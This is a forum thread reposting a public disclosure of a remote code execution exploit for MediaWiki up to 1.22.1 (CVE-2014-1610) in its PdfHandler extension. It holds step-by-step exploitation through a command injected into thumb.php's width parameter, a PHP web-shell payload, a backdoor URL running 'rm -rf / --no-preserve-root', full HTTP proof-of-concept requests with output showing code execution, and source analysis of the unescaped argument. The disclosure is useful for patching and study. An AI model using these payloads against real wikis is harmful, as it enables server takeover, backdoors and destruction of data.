Nytro Posted February 2, 2014 Report Posted February 2, 2014 (edited) MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)From: Pichaya Morimoto <pichaya () ieee org>Date: Sat, 1 Feb 2014 22:28:51 +0700-----BEGIN PGP SIGNED MESSAGE-----Hash: SHA1###################################################################### MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit(CVE-2014-1610)# Reported by Netanel Rubin - Check Point's Vulnerability Research Group(Jan 19, 2014)# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014)# Affected website : Wikipedia.org and more !## Exploit author : Xelenonz & @u0x (Pichaya Morimoto)# Release dates : Feb 1, 2014# Special Thanks to 2600 Thailand !###################################################################### Exploit:####################################################################1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)http://vulnerable-site/index.php/Special:Upload2. inject os cmd to upload a php-backdoorhttp://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20"<?php%20system(\\$_GET[1]);">https://rstforums.com/forum/images/xnz.php`3. access to php-backdoor!http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root4. happy pwning!!# Related files:####################################################################thumb.php <-- extract all _GET array to params/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/widthoptions/includes/media/ImageHandler.php/includes/GlobalFunctions.phpincludes/filerepo/file/File.php# Vulnerability Analysis:####################################################################1. thumb.phpThis script used to resize images if it is configured to be donewhen the web browser requests the image<? ...1.1 Called directly, use $_GET paramswfThumbHandleRequest();1.2 Handle a thumbnail request via query parametersfunction wfThumbHandleRequest() {$params = get_magic_quotes_gpc()? array_map( 'stripslashes', $_GET ): $_GET;wfStreamThumb( $params ); // stream the thumbnail}1.3 Stream a thumbnail specified by parametersfunction wfStreamThumb( array $params ) {...$fileName = isset( $params['f'] ) ? $params['f'] : ''; // << putsuploaded.pdf file here...// Backwards compatibility parametersif ( isset( $params['w'] ) ) {$params['width'] = $params['w']; // << Inject os cmd here!unset( $params['w'] );}...$img = wfLocalFile( $fileName );...// Thumbnail isn't already there, so create the new thumbnail...$thumb = $img->transform( $params, File::RENDER_NOW ); // << resize imageby width/height...// Stream the file if there were no errors$thumb->streamFile( $headers );...?>2. /includes/filerepo/file/File.php<? ...function transform( $params, $flags = 0 ) { ...$handler = $this->getHandler(); // << PDF Handler...$normalisedParams = $params;$handler->normaliseParams( $this, $normalisedParams );...$thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );..?>3. /extensions/PdfHandler/PdfHandler_body.php<? ...function doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) {...$width = $params['width'];...$cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd ¶meters$cmd .= " -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page}-dLastPage={$page}";$cmd .= " -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q ". wfEscapeShellArg($srcPath );$cmd .= " | " . wfEscapeShellArg( $wgPdfPostProcessor );$cmd .= " -depth 8 -resize {$width} - "; // << FAILED to escape shellargument$cmd .= wfEscapeShellArg( $dstPath ) . ")";$cmd .= " 2>&1";...$err = wfShellExec( $cmd, $retval );...?>4. /includes/GlobalFunctions.phpExecute a shell command, with time and memory limits<? ...function wfShellExec( $cmd, &$retval = null, $environ = array(), $limits =array() ) {...passthru( $cmd, $retval ); // << Execute here!!POC:GET/mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C?php%20system(\\$_GET[1]);%22%3Eimages/longcat.php`HTTP/1.1Host: 127.0.0.1Connection: keep-aliveAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip,deflate,sdchAccept-Language: en-US,en;q=0.8Cookie: my_wikiUserID=2; my_wikiUserName=Longcat;my_wiki_session=op3h2huvddnmg7gji0pscfsg02<html><head><title>Error generating thumbnail</title></head><body><h1>Error generating thumbnail</h1><p>?????????????????????????????: /bin/bash: -: command not found<br />convert: option requires an argument `-resize' @error/convert.c/ConvertImageCommand/2380.<br />GPL Ghostscript 9.10: Unrecoverable error, exit code 1<br /></p></body></html>GET /mediawiki1221/images/longcat.php?1=id HTTP/1.1Host: 127.0.0.1Connection: keep-aliveAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip,deflate,sdchAccept-Language: en-US,en;q=0.8Cookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2;my_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1uid=33(www-data) gid=33(www-data) groups=33(www-data)# Back-end $cmd ####################################################################GlobalFunctions.php : wfShellExec()cmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150-dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' |'/usr/bin/convert' -depth 8 -resize 10|`echo "<?phpsystem(\\$_GET[1]);">images/longcat.php` -'/tmp/transform_0e377aad0e27-1.jpg') 2>&1Sursa: Full Disclosure: MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610) Edited February 2, 2014 by Nytro Quote
florinul Posted February 2, 2014 Report Posted February 2, 2014 interesant dar pare destul de complicat Quote
